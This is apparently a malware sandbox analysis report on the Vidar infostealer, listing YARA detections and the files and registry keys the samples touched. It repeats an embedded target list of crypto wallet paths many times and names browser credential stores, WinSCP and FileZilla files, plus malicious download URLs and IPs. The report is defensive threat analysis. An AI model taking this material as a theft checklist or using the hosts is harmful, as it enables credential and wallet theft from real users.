Source: Yara match	File source: 17.2.httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.38b5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1910895960.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1890590465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6916, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: bomb.exe, 00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 9https://electrum-zec.org/download/electrum-zec-4.3.2.dmg
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: )http://194.59.31.28/uploads/exodus1.asar
Source: MSBuild.exe, 00000008.00000002.3073992557.0000000001331000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe, 00000006.00000000.1854912561.00000000003D2000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: StringToIntgetMachineKeyStore
Source: MSBuild.exe, 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
